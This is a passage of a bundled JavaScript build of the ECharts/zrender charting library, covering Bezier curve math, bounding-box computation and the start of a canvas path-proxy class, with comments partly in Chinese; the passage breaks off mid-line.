file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar getAreaStyle = makeStyleMapper(\n    [\n        ['fill', 'color'],\n        ['shadowBlur'],\n        ['shadowOffsetX'],\n        ['shadowOffsetY'],\n        ['opacity'],\n        ['shadowColor']\n    ]\n);\n\nvar areaStyleMixin = {\n    getAreaStyle: function (excludes, includes) {\n        return getAreaStyle(this, excludes, includes);\n    }\n};\n\n/**\n * 曲线辅助模块\n * @module zrender/core/curve\n * @author pissang(https://www.github.com/pissang)\n */\n\nvar mathPow = Math.pow;\nvar mathSqrt$2 = Math.sqrt;\n\nvar EPSILON$1 = 1e-8;\nvar EPSILON_NUMERIC = 1e-4;\n\nvar THREE_SQRT = mathSqrt$2(3);\nvar ONE_THIRD = 1 / 3;\n\n// 临时变量\nvar _v0 = create();\nvar _v1 = create();\nvar _v2 = create();\n\nfunction isAroundZero(val) {\n    return val > -EPSILON$1 && val < EPSILON$1;\n}\nfunction isNotAroundZero$1(val) {\n    return val > EPSILON$1 || val < -EPSILON$1;\n}\n/**\n * 计算三次贝塞尔值\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {number} t\n * @return {number}\n */\nfunction cubicAt(p0, p1, p2, p3, t) {\n    var onet = 1 - t;\n    return onet * onet * (onet * p0 + 3 * t * p1)\n            + t * t * (t * p3 + 3 * onet * p2);\n}\n\n/**\n * 计算三次贝塞尔导数值\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {number} t\n * @return {number}\n */\nfunction cubicDerivativeAt(p0, p1, p2, p3, t) {\n    var onet = 1 - t;\n    return 3 * (\n        ((p1 - p0) * onet + 2 * (p2 - p1) * t) * onet\n        + (p3 - p2) * t * t\n    );\n}\n\n/**\n * 计算三次贝塞尔方程根，使用盛金公式\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {number} val\n * @param  {Array.<number>} roots\n * @return {number} 有效根数目\n */\nfunction cubicRootAt(p0, p1, p2, p3, val, roots) {\n    // Evaluate roots of cubic functions\n    var a = p3 + 3 * (p1 - p2) - p0;\n    var b = 3 * (p2 - p1 * 2 + p0);\n    var c = 3 * (p1 - p0);\n    var d = p0 - val;\n\n    var A = b * b - 3 * a * c;\n    var B = b * c - 9 * a * d;\n    var C = c * c - 3 * b * d;\n\n    var n = 0;\n\n    if (isAroundZero(A) && isAroundZero(B)) {\n        if (isAroundZero(b)) {\n            roots[0] = 0;\n        }\n        else {\n            var t1 = -c / b;  //t1, t2, t3, b is not zero\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n        }\n    }\n    else {\n        var disc = B * B - 4 * A * C;\n\n        if (isAroundZero(disc)) {\n            var K = B / A;\n            var t1 = -b / a + K;  // t1, a is not zero\n            var t2 = -K / 2;  // t2, t3\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n            if (t2 >= 0 && t2 <= 1) {\n                roots[n++] = t2;\n            }\n        }\n        else if (disc > 0) {\n            var discSqrt = mathSqrt$2(disc);\n            var Y1 = A * b + 1.5 * a * (-B + discSqrt);\n            var Y2 = A * b + 1.5 * a * (-B - discSqrt);\n            if (Y1 < 0) {\n                Y1 = -mathPow(-Y1, ONE_THIRD);\n            }\n            else {\n                Y1 = mathPow(Y1, ONE_THIRD);\n            }\n            if (Y2 < 0) {\n                Y2 = -mathPow(-Y2, ONE_THIRD);\n            }\n            else {\n                Y2 = mathPow(Y2, ONE_THIRD);\n            }\n            var t1 = (-b - (Y1 + Y2)) / (3 * a);\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n        }\n        else {\n            var T = (2 * A * b - 3 * a * B) / (2 * mathSqrt$2(A * A * A));\n            var theta = Math.acos(T) / 3;\n            var ASqrt = mathSqrt$2(A);\n            var tmp = Math.cos(theta);\n\n            var t1 = (-b - 2 * ASqrt * tmp) / (3 * a);\n            var t2 = (-b + ASqrt * (tmp + THREE_SQRT * Math.sin(theta))) / (3 * a);\n            var t3 = (-b + ASqrt * (tmp - THREE_SQRT * Math.sin(theta))) / (3 * a);\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n            if (t2 >= 0 && t2 <= 1) {\n                roots[n++] = t2;\n            }\n            if (t3 >= 0 && t3 <= 1) {\n                roots[n++] = t3;\n            }\n        }\n    }\n    return n;\n}\n\n/**\n * 计算三次贝塞尔方程极限值的位置\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {Array.<number>} extrema\n * @return {number} 有效数目\n */\nfunction cubicExtrema(p0, p1, p2, p3, extrema) {\n    var b = 6 * p2 - 12 * p1 + 6 * p0;\n    var a = 9 * p1 + 3 * p3 - 3 * p0 - 9 * p2;\n    var c = 3 * p1 - 3 * p0;\n\n    var n = 0;\n    if (isAroundZero(a)) {\n        if (isNotAroundZero$1(b)) {\n            var t1 = -c / b;\n            if (t1 >= 0 && t1 <= 1) {\n                extrema[n++] = t1;\n            }\n        }\n    }\n    else {\n        var disc = b * b - 4 * a * c;\n        if (isAroundZero(disc)) {\n            extrema[0] = -b / (2 * a);\n        }\n        else if (disc > 0) {\n            var discSqrt = mathSqrt$2(disc);\n            var t1 = (-b + discSqrt) / (2 * a);\n            var t2 = (-b - discSqrt) / (2 * a);\n            if (t1 >= 0 && t1 <= 1) {\n                extrema[n++] = t1;\n            }\n            if (t2 >= 0 && t2 <= 1) {\n                extrema[n++] = t2;\n            }\n        }\n    }\n    return n;\n}\n\n/**\n * 细分三次贝塞尔曲线\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} p3\n * @param  {number} t\n * @param  {Array.<number>} out\n */\nfunction cubicSubdivide(p0, p1, p2, p3, t, out) {\n    var p01 = (p1 - p0) * t + p0;\n    var p12 = (p2 - p1) * t + p1;\n    var p23 = (p3 - p2) * t + p2;\n\n    var p012 = (p12 - p01) * t + p01;\n    var p123 = (p23 - p12) * t + p12;\n\n    var p0123 = (p123 - p012) * t + p012;\n    // Seg0\n    out[0] = p0;\n    out[1] = p01;\n    out[2] = p012;\n    out[3] = p0123;\n    // Seg1\n    out[4] = p0123;\n    out[5] = p123;\n    out[6] = p23;\n    out[7] = p3;\n}\n\n/**\n * 投射点到三次贝塞尔曲线上，返回投射距离。\n * 投射点有可能会有一个或者多个，这里只返回其中距离最短的一个。\n * @param {number} x0\n * @param {number} y0\n * @param {number} x1\n * @param {number} y1\n * @param {number} x2\n * @param {number} y2\n * @param {number} x3\n * @param {number} y3\n * @param {number} x\n * @param {number} y\n * @param {Array.<number>} [out] 投射点\n * @return {number}\n */\nfunction cubicProjectPoint(\n    x0, y0, x1, y1, x2, y2, x3, y3,\n    x, y, out\n) {\n    // http://pomax.github.io/bezierinfo/#projections\n    var t;\n    var interval = 0.005;\n    var d = Infinity;\n    var prev;\n    var next;\n    var d1;\n    var d2;\n\n    _v0[0] = x;\n    _v0[1] = y;\n\n    // 先粗略估计一下可能的最小距离的 t 值\n    // PENDING\n    for (var _t = 0; _t < 1; _t += 0.05) {\n        _v1[0] = cubicAt(x0, x1, x2, x3, _t);\n        _v1[1] = cubicAt(y0, y1, y2, y3, _t);\n        d1 = distSquare(_v0, _v1);\n        if (d1 < d) {\n            t = _t;\n            d = d1;\n        }\n    }\n    d = Infinity;\n\n    // At most 32 iteration\n    for (var i = 0; i < 32; i++) {\n        if (interval < EPSILON_NUMERIC) {\n            break;\n        }\n        prev = t - interval;\n        next = t + interval;\n        // t - interval\n        _v1[0] = cubicAt(x0, x1, x2, x3, prev);\n        _v1[1] = cubicAt(y0, y1, y2, y3, prev);\n\n        d1 = distSquare(_v1, _v0);\n\n        if (prev >= 0 && d1 < d) {\n            t = prev;\n            d = d1;\n        }\n        else {\n            // t + interval\n            _v2[0] = cubicAt(x0, x1, x2, x3, next);\n            _v2[1] = cubicAt(y0, y1, y2, y3, next);\n            d2 = distSquare(_v2, _v0);\n\n            if (next <= 1 && d2 < d) {\n                t = next;\n                d = d2;\n            }\n            else {\n                interval *= 0.5;\n            }\n        }\n    }\n    // t\n    if (out) {\n        out[0] = cubicAt(x0, x1, x2, x3, t);\n        out[1] = cubicAt(y0, y1, y2, y3, t);\n    }\n    // console.log(interval, i);\n    return mathSqrt$2(d);\n}\n\n/**\n * 计算二次方贝塞尔值\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} t\n * @return {number}\n */\nfunction quadraticAt(p0, p1, p2, t) {\n    var onet = 1 - t;\n    return onet * (onet * p0 + 2 * t * p1) + t * t * p2;\n}\n\n/**\n * 计算二次方贝塞尔导数值\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} t\n * @return {number}\n */\nfunction quadraticDerivativeAt(p0, p1, p2, t) {\n    return 2 * ((1 - t) * (p1 - p0) + t * (p2 - p1));\n}\n\n/**\n * 计算二次方贝塞尔方程根\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} t\n * @param  {Array.<number>} roots\n * @return {number} 有效根数目\n */\nfunction quadraticRootAt(p0, p1, p2, val, roots) {\n    var a = p0 - 2 * p1 + p2;\n    var b = 2 * (p1 - p0);\n    var c = p0 - val;\n\n    var n = 0;\n    if (isAroundZero(a)) {\n        if (isNotAroundZero$1(b)) {\n            var t1 = -c / b;\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n        }\n    }\n    else {\n        var disc = b * b - 4 * a * c;\n        if (isAroundZero(disc)) {\n            var t1 = -b / (2 * a);\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n        }\n        else if (disc > 0) {\n            var discSqrt = mathSqrt$2(disc);\n            var t1 = (-b + discSqrt) / (2 * a);\n            var t2 = (-b - discSqrt) / (2 * a);\n            if (t1 >= 0 && t1 <= 1) {\n                roots[n++] = t1;\n            }\n            if (t2 >= 0 && t2 <= 1) {\n                roots[n++] = t2;\n            }\n        }\n    }\n    return n;\n}\n\n/**\n * 计算二次贝塞尔方程极限值\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @return {number}\n */\nfunction quadraticExtremum(p0, p1, p2) {\n    var divider = p0 + p2 - 2 * p1;\n    if (divider === 0) {\n        // p1 is center of p0 and p2\n        return 0.5;\n    }\n    else {\n        return (p0 - p1) / divider;\n    }\n}\n\n/**\n * 细分二次贝塞尔曲线\n * @memberOf module:zrender/core/curve\n * @param  {number} p0\n * @param  {number} p1\n * @param  {number} p2\n * @param  {number} t\n * @param  {Array.<number>} out\n */\nfunction quadraticSubdivide(p0, p1, p2, t, out) {\n    var p01 = (p1 - p0) * t + p0;\n    var p12 = (p2 - p1) * t + p1;\n    var p012 = (p12 - p01) * t + p01;\n\n    // Seg0\n    out[0] = p0;\n    out[1] = p01;\n    out[2] = p012;\n\n    // Seg1\n    out[3] = p012;\n    out[4] = p12;\n    out[5] = p2;\n}\n\n/**\n * 投射点到二次贝塞尔曲线上，返回投射距离。\n * 投射点有可能会有一个或者多个，这里只返回其中距离最短的一个。\n * @param {number} x0\n * @param {number} y0\n * @param {number} x1\n * @param {number} y1\n * @param {number} x2\n * @param {number} y2\n * @param {number} x\n * @param {number} y\n * @param {Array.<number>} out 投射点\n * @return {number}\n */\nfunction quadraticProjectPoint(\n    x0, y0, x1, y1, x2, y2,\n    x, y, out\n) {\n    // http://pomax.github.io/bezierinfo/#projections\n    var t;\n    var interval = 0.005;\n    var d = Infinity;\n\n    _v0[0] = x;\n    _v0[1] = y;\n\n    // 先粗略估计一下可能的最小距离的 t 值\n    // PENDING\n    for (var _t = 0; _t < 1; _t += 0.05) {\n        _v1[0] = quadraticAt(x0, x1, x2, _t);\n        _v1[1] = quadraticAt(y0, y1, y2, _t);\n        var d1 = distSquare(_v0, _v1);\n        if (d1 < d) {\n            t = _t;\n            d = d1;\n        }\n    }\n    d = Infinity;\n\n    // At most 32 iteration\n    for (var i = 0; i < 32; i++) {\n        if (interval < EPSILON_NUMERIC) {\n            break;\n        }\n        var prev = t - interval;\n        var next = t + interval;\n        // t - interval\n        _v1[0] = quadraticAt(x0, x1, x2, prev);\n        _v1[1] = quadraticAt(y0, y1, y2, prev);\n\n        var d1 = distSquare(_v1, _v0);\n\n        if (prev >= 0 && d1 < d) {\n            t = prev;\n            d = d1;\n        }\n        else {\n            // t + interval\n            _v2[0] = quadraticAt(x0, x1, x2, next);\n            _v2[1] = quadraticAt(y0, y1, y2, next);\n            var d2 = distSquare(_v2, _v0);\n            if (next <= 1 && d2 < d) {\n                t = next;\n                d = d2;\n            }\n            else {\n                interval *= 0.5;\n            }\n        }\n    }\n    // t\n    if (out) {\n        out[0] = quadraticAt(x0, x1, x2, t);\n        out[1] = quadraticAt(y0, y1, y2, t);\n    }\n    // console.log(interval, i);\n    return mathSqrt$2(d);\n}\n\n/**\n * @author Yi Shen(https://github.com/pissang)\n */\n\nvar mathMin$3 = Math.min;\nvar mathMax$3 = Math.max;\nvar mathSin$2 = Math.sin;\nvar mathCos$2 = Math.cos;\nvar PI2 = Math.PI * 2;\n\nvar start = create();\nvar end = create();\nvar extremity = create();\n\n/**\n * 从顶点数组中计算出最小包围盒，写入`min`和`max`中\n * @module zrender/core/bbox\n * @param {Array<Object>} points 顶点数组\n * @param {number} min\n * @param {number} max\n */\nfunction fromPoints(points, min$$1, max$$1) {\n    if (points.length === 0) {\n        return;\n    }\n    var p = points[0];\n    var left = p[0];\n    var right = p[0];\n    var top = p[1];\n    var bottom = p[1];\n    var i;\n\n    for (i = 1; i < points.length; i++) {\n        p = points[i];\n        left = mathMin$3(left, p[0]);\n        right = mathMax$3(right, p[0]);\n        top = mathMin$3(top, p[1]);\n        bottom = mathMax$3(bottom, p[1]);\n    }\n\n    min$$1[0] = left;\n    min$$1[1] = top;\n    max$$1[0] = right;\n    max$$1[1] = bottom;\n}\n\n/**\n * @memberOf module:zrender/core/bbox\n * @param {number} x0\n * @param {number} y0\n * @param {number} x1\n * @param {number} y1\n * @param {Array.<number>} min\n * @param {Array.<number>} max\n */\nfunction fromLine(x0, y0, x1, y1, min$$1, max$$1) {\n    min$$1[0] = mathMin$3(x0, x1);\n    min$$1[1] = mathMin$3(y0, y1);\n    max$$1[0] = mathMax$3(x0, x1);\n    max$$1[1] = mathMax$3(y0, y1);\n}\n\nvar xDim = [];\nvar yDim = [];\n/**\n * 从三阶贝塞尔曲线(p0, p1, p2, p3)中计算出最小包围盒，写入`min`和`max`中\n * @memberOf module:zrender/core/bbox\n * @param {number} x0\n * @param {number} y0\n * @param {number} x1\n * @param {number} y1\n * @param {number} x2\n * @param {number} y2\n * @param {number} x3\n * @param {number} y3\n * @param {Array.<number>} min\n * @param {Array.<number>} max\n */\nfunction fromCubic(\n    x0, y0, x1, y1, x2, y2, x3, y3, min$$1, max$$1\n) {\n    var cubicExtrema$$1 = cubicExtrema;\n    var cubicAt$$1 = cubicAt;\n    var i;\n    var n = cubicExtrema$$1(x0, x1, x2, x3, xDim);\n    min$$1[0] = Infinity;\n    min$$1[1] = Infinity;\n    max$$1[0] = -Infinity;\n    max$$1[1] = -Infinity;\n\n    for (i = 0; i < n; i++) {\n        var x = cubicAt$$1(x0, x1, x2, x3, xDim[i]);\n        min$$1[0] = mathMin$3(x, min$$1[0]);\n        max$$1[0] = mathMax$3(x, max$$1[0]);\n    }\n    n = cubicExtrema$$1(y0, y1, y2, y3, yDim);\n    for (i = 0; i < n; i++) {\n        var y = cubicAt$$1(y0, y1, y2, y3, yDim[i]);\n        min$$1[1] = mathMin$3(y, min$$1[1]);\n        max$$1[1] = mathMax$3(y, max$$1[1]);\n    }\n\n    min$$1[0] = mathMin$3(x0, min$$1[0]);\n    max$$1[0] = mathMax$3(x0, max$$1[0]);\n    min$$1[0] = mathMin$3(x3, min$$1[0]);\n    max$$1[0] = mathMax$3(x3, max$$1[0]);\n\n    min$$1[1] = mathMin$3(y0, min$$1[1]);\n    max$$1[1] = mathMax$3(y0, max$$1[1]);\n    min$$1[1] = mathMin$3(y3, min$$1[1]);\n    max$$1[1] = mathMax$3(y3, max$$1[1]);\n}\n\n/**\n * 从二阶贝塞尔曲线(p0, p1, p2)中计算出最小包围盒，写入`min`和`max`中\n * @memberOf module:zrender/core/bbox\n * @param {number} x0\n * @param {number} y0\n * @param {number} x1\n * @param {number} y1\n * @param {number} x2\n * @param {number} y2\n * @param {Array.<number>} min\n * @param {Array.<number>} max\n */\nfunction fromQuadratic(x0, y0, x1, y1, x2, y2, min$$1, max$$1) {\n    var quadraticExtremum$$1 = quadraticExtremum;\n    var quadraticAt$$1 = quadraticAt;\n    // Find extremities, where derivative in x dim or y dim is zero\n    var tx =\n        mathMax$3(\n            mathMin$3(quadraticExtremum$$1(x0, x1, x2), 1), 0\n        );\n    var ty =\n        mathMax$3(\n            mathMin$3(quadraticExtremum$$1(y0, y1, y2), 1), 0\n        );\n\n    var x = quadraticAt$$1(x0, x1, x2, tx);\n    var y = quadraticAt$$1(y0, y1, y2, ty);\n\n    min$$1[0] = mathMin$3(x0, x2, x);\n    min$$1[1] = mathMin$3(y0, y2, y);\n    max$$1[0] = mathMax$3(x0, x2, x);\n    max$$1[1] = mathMax$3(y0, y2, y);\n}\n\n/**\n * 从圆弧中计算出最小包围盒，写入`min`和`max`中\n * @method\n * @memberOf module:zrender/core/bbox\n * @param {number} x\n * @param {number} y\n * @param {number} rx\n * @param {number} ry\n * @param {number} startAngle\n * @param {number} endAngle\n * @param {number} anticlockwise\n * @param {Array.<number>} min\n * @param {Array.<number>} max\n */\nfunction fromArc(\n    x, y, rx, ry, startAngle, endAngle, anticlockwise, min$$1, max$$1\n) {\n    var vec2Min = min;\n    var vec2Max = max;\n\n    var diff = Math.abs(startAngle - endAngle);\n\n\n    if (diff % PI2 < 1e-4 && diff > 1e-4) {\n        // Is a circle\n        min$$1[0] = x - rx;\n        min$$1[1] = y - ry;\n        max$$1[0] = x + rx;\n        max$$1[1] = y + ry;\n        return;\n    }\n\n    start[0] = mathCos$2(startAngle) * rx + x;\n    start[1] = mathSin$2(startAngle) * ry + y;\n\n    end[0] = mathCos$2(endAngle) * rx + x;\n    end[1] = mathSin$2(endAngle) * ry + y;\n\n    vec2Min(min$$1, start, end);\n    vec2Max(max$$1, start, end);\n\n    // Thresh to [0, Math.PI * 2]\n    startAngle = startAngle % (PI2);\n    if (startAngle < 0) {\n        startAngle = startAngle + PI2;\n    }\n    endAngle = endAngle % (PI2);\n    if (endAngle < 0) {\n        endAngle = endAngle + PI2;\n    }\n\n    if (startAngle > endAngle && !anticlockwise) {\n        endAngle += PI2;\n    }\n    else if (startAngle < endAngle && anticlockwise) {\n        startAngle += PI2;\n    }\n    if (anticlockwise) {\n        var tmp = endAngle;\n        endAngle = startAngle;\n        startAngle = tmp;\n    }\n\n    // var number = 0;\n    // var step = (anticlockwise ? -Math.PI : Math.PI) / 2;\n    for (var angle = 0; angle < endAngle; angle += Math.PI / 2) {\n        if (angle > startAngle) {\n            extremity[0] = mathCos$2(angle) * rx + x;\n            extremity[1] = mathSin$2(angle) * ry + y;\n\n            vec2Min(min$$1, extremity, min$$1);\n            vec2Max(max$$1, extremity, max$$1);\n        }\n    }\n}\n\n/**\n * Path 代理，可以在`buildPath`中用于替代`ctx`, 会保存每个path操作的命令到pathCommands属性中\n * 可以用于 isInsidePath 判断以及获取boundingRect\n *\n * @module zrender/core/PathProxy\n * @author Yi Shen (http://www.github.com/pissang)\n */\n\n// TODO getTotalLength, getPointAtLength\n\n/* global Float32Array */\n\nvar CMD = {\n    M: 1,\n    L: 2,\n    C: 3,\n    Q: 4,\n    A: 5,\n    Z: 6,\n    // Rect\n    R: 7\n};\n\n// var CMD_MEM_SIZE = {\n//     M: 3,\n//     L: 3,\n//     C: 7,\n//     Q: 5,\n//     A: 9,\n//     R: 5,\n//     Z: 1\n// };\n\nvar min$1 = [];\nvar max$1 = [];\nvar min2 = [];\nvar max2 = [];\nvar mathMin$2 = Math.min;\nvar mathMax$2 = Math.max;\nvar mathCos$1 = Math.cos;\nvar mathSin$1 = Math.sin;\nvar mathSqrt$1 = Math.sqrt;\nvar mathAbs = Math.abs;\n\nvar hasTypedArray = typeof Float32Array !== 'undefined';\n\n/**\n * @alias module:zrender/core/PathProxy\n * @constructor\n */\nvar PathProxy = function (notSaveData) {\n\n    this._saveData = !(notSaveData || false);\n\n    if (this._saveData) {\n        /**\n         * Path data. Stored as flat array\n         * @type {Array.<Object>}\n         */\n        this.data = [];\n    }\n\n    this._ctx = null;\n};\n\n/**\n * 快速计算Path包围盒（并不是最小包围盒）\n * @return {Object}\n */\nPathProxy.prototype = {\n\n    constructor: PathProxy,\n\n    _xi: 0,\n    _yi: 0,\n\n    _x0: 0,\n    _y0: 0,\n    // Unit x, Unit y. Provide for avoiding drawing that too short line segment\n    _ux: 0,\n    _uy: 0,\n\n    _len: 0,\n\n    _lineDash: null,\n\n    _dashOffset: 0,\n\n    _dashIdx: 0,\n\n    _dashSum: 0,\n\n    /**\n     * @readOnly\n     */\n    setScale: function (sx, sy, segmentIgnoreThreshold) {\n        // Compat. Previously there is no segmentIgnoreThreshold.\n        segmentIgnoreThreshold = segmentIgnoreThreshold || 0;\n        this._ux = mathAbs(segmentIgnoreThreshold / devicePixelRatio / sx) || 0;\n        this._uy = mathAbs(segmentIgnoreThreshold / devicePixelRatio / sy) || 0;\n    },\n\n    getContext: function () {\n        return this._ctx;\n    },\n\n    /**\n     * @param  {CanvasRenderingContext2D} ctx\n     * @return {module:zrender/core/PathProxy}\n     */\n    beginPath: function (ctx) {\n\n        this._ctx = ctx;\n\n        ctx && ctx.beginPath();\n\n        ctx && (this.dpr = ctx.dpr);\n\n        // Reset\n        if (this._saveData) {\n            this._len = 0;\n        }\n\n        if (this._lineDash) {\n            this._lineDash = null;\n\n            this._dashOffset = 0;\n        }\n\n        return this;\n    },\n\n    /**\n     * @param  {number} x\n     * @param  {number} y\n     * @return {module:zrender/core/PathProxy}\n     */\n    moveTo: function (x, y) {\n        this.addData(CMD.M, x, y);\n        this._ctx && this._ctx.moveTo(x, y);\n\n        // x0, y0, xi, yi 是记录在 _dashedXXXXTo 方法中使用\n        // xi, yi 记录当前点, x0, y0 在 closePath 的时候回到起始点。\n        // 有可能在 beginPath 之后直接调用 lineTo，这时候 x0, y0 需要\n        // 在 lineTo 方法中记录，这里先不考虑这种情况，dashed line 也只在 IE10- 中不支持\n        this._x0 = x;\n        this._y0 = y;\n\n        this._xi = x;\n        this._yi = y;\n\n        return this;\n    },\n\n    /**\n     * @param  {number} x\n     * @param  {number} y\n     * @return {module:zrender/core/PathProxy}\n     */\n    lineTo: function (x, y) {\n        var exceedUnit = mathAbs(x - this._xi) > this._ux\n            || mathAbs(y - this._yi) > this._uy\n            // Force draw the first segment\n            || this._len < 5;\n\n        this.addData(CMD.L, x, y);\n\n        if (this._ctx && exceedUnit) {\n            this._needsDash() ? this._dashedLineTo(x, y)\n                : this._ctx.lineTo(x, y);\n        }\n        if (exceedUnit) {\n            this._xi = x;\n            this._yi = y;\n        }\n\n        return this;\n    },\n\n    /**\n     * @param  {number} x1\n     * @param  {number} y1\n     * @param  {number} x2\n     * @param  {number} y2\n     * @param  {number} x3\n     * @param  {number} y3\n     * @return {module:zrender/core/PathProxy}\n     */\n    bezierCurveTo: function (x1, y1, x2, y2, x3, y3) {\n        this.addData(CMD.C, x1, y1, x2, y2, x3, y3);\n        if (this._ctx) {\n            this._needsDash() ? this._dashedBezierTo(x1, y1, x2, y2, x3, y3)\n                : this._ctx.bezierCurveTo(x1, y1, x2, y2, x3, y3);\n        }\n        this._xi = x3;\n        this._yi = y3;\n        return this;\n    },\n\n    /**\n     * @param  {number} x1\n     * @param  {number} y1\n     * @param  {number} x2\n     * @param  {number} y2\n     * @return {module:zrender/core/PathProxy}\n     */\n    quadraticCurveTo: function (x1, y1, x2, y2) {\n        this.addData(CMD.Q, x1, y1, x2, y2);\n        if (this._ctx) {\n            this._needsDash() ? this._dashedQuadraticTo(x1, y1, x2, y2)\n                : this._ctx.quadraticCurveTo(x1, y1, x2, y2);\n        }\n        this._xi = x2;\n        this._yi = y2;\n        return this;\n    },\n\n    /**\n     * @param  {number} cx\n     * @param  {number} cy\n     * @param  {number} r\n     * @param  {number} startAngle\n     * @param  {number} endAngle\n     * @param  {boolean} anticlockwise\n     * @return {module:zrender/core/PathProxy}\n     */\n    arc: function (cx, cy, r, startAngle, endAngle, anticlockwise) {\n        this.addData(\n            CMD.A, cx, cy, r, r, startAngle, endAngle - startAngle, 0, anticlockwise ? 0 : 1\n        );\n        this._ctx && this._ctx.arc(cx, cy, r, startAngle, endAngle, anticlockwise);\n\n        this._xi = mathCos$1(endAngle) * r + cx;\n        this._yi = mathSin$1(endAngle) * r + cy;\n        return this;\n    },\n\n    // TODO\n    arcTo: function (x1, y1, x2, y2, radius) {\n        if (this._ctx) {\n            this._ctx.arcTo(x1, y1, x2, y2, radius);\n        }\n        return this;\n    },\n\n    // TODO\n    rect: function (x, y, w, h) {\n        this._ctx && this._ctx.rect(x, y, w, h);\n        this.addData(CMD.R, x, y, w, h);\n        return this;\n    },\n\n    /**\n     * @return {module:zrender/core/PathProxy}\n     */\n    closePath: function () {\n        this.addData(CMD.Z);\n\n        var ctx = this._ctx;\n        var x0 = this._x0;\n        var y0 = this._y0;\n        if (ctx) {\n            this._needsDash() && this._dashedLineTo(x0, y0);\n            ctx.closePath();\n        }\n\n        this._xi = x0;\n        this._yi = y0;\n        return this;\n    },\n\n    /**\n     * Context 从外部传入，因为有可能是 rebuildPath 完之后再 fill。\n     * stroke 同样\n     * @param {CanvasRenderingContext2D} ctx\n     * @return {module:zrender/core/PathProxy}\n     */\n    fill: function (ctx) {\n        ctx && ctx.fill();\n        this.toStatic();\n    },\n\n    /**\n     * @param {CanvasRenderingContext2D} ctx\n     * @return {module:zrender/core/PathProxy}\n     */\n    stroke: function (ctx) {\n        ctx && ctx.stroke();\n        this.toStatic();\n    },\n\n    /**\n     * 必须在其它绘制命令前调用\n     * Must be invoked before all other path drawing methods\n     * @return {module:zrender/core/PathProxy}\n     */\n    setLineDash: function (lineDash) {\n        if (lineDash instanceof Array) {\n            this._lineDash = lineDash;\n\n            this._dashIdx = 0;\n\n            var lineDashSum = 0;\n            for (var i = 0; i < lineDash.length; i++) {\n                lineDashSum += lineDash[i];\n            }\n            this._dashSum = lineDashSum;\n        }\n        return this;\n    },\n\n    /**\n     * 必须在其它绘制命令前调用\n     * Must be invoked before all other path drawing methods\n     * @return {module:zrender/core/PathProxy}\n     */\n    setLineDashOffset: function (offset) {\n        this._dashOffset = offset;\n        return this;\n    },\n\n    /**\n     *\n     * @return {boolean}\n     */\n    len: function () {\n        return this._len;\n    },\n\n    /**\n     * 直接设置 Path 数据\n     */\n    setData: function (data) {\n\n        var len$$1 = data.length;\n\n        if (!(this.data && this.data.length === len$$1) && hasTypedArray) {\n            this.data = new Float32Array(len$$1);\n        }\n\n        for (var i = 0; i < len$$1; i++) {\n            this.data[i] = data[i];\n        }\n\n        this._len = len$$1;\n    },\n\n    /**\n     * 添加子路径\n     * @param {module:zrender/core/PathProxy|Array.<module:zrender/core/PathProxy>} path\n     */\n    appendPath: function (path) {\n        if (!(path instanceof Array)) {\n            path = [path];\n        }\n        var len$$1 = path.length;\n        var appendSize = 0;\n        var offset = this._len;\n        for (var i = 0; i < len$$1; i++) {\n            appendSize += path[i].len();\n        }\n        if (hasTypedArray && (this.data instanceof Float32Array)) {\n            this.data = new Float32Array(offset + appendSize);\n        }\n        for (var i = 0; i < len$$1; i++) {\n            var appendPathData = path[i].data;\n            for (var k = 0; k < appendPathData.length; k++) {\n                this.data[offset++] = appendPathData[k];\n            }\n        }\n        this._len = offset;\n    },\n\n    /**\n     * 填充 Path 数据。\n     * 尽量复用而不申明新的数组。大部分图形重绘的指令数据长度都是不变的。\n     */\n    addData: function (cmd) {\n        if (!this._saveData) {\n            return;\n        }\n\n        var data = this.data;\n        if (this._len + arguments.length > data.length) {\n            // 因为之前的数组已经转换成静态的 Float32Array\n            // 所以不够用时需要扩展一个新的动态数组\n            this._expandData();\n            data = this.data;\n        }\n        for (var i = 0; i < arguments.length; i++) {\n            data[this._len++] = arguments[i];\n        }\n\n        this._prevCmd = cmd;\n    },\n\n    _expandData: function () {\n        // Only if data is Float32Array\n        if (!(this.data instanceof Array)) {\n            var newData = [];\n            for (var i = 0; i < this._len; i++) {\n                newData[i] = this.data[i];\n            }\n            this.data = newData;\n        }\n    },\n\n    /**\n     * If needs js implemented dashed line\n     * @return {boolean}\n     * @private\n     */\n    _needsDash: function () {\n        return this._lineDash;\n    },\n\n    _dashedLineTo: function (x1, y1) {\n        var dashSum = this._dashSum;\n        var offset = this._dashOffset;\n        var lineDash = this._lineDash;\n        var ctx = this._ctx;\n\n        var x0 = this._xi;\n        var y0 = this._yi;\n        var dx = x1 - x0;\n        var dy = y1 - y0;\n        var dist$$1 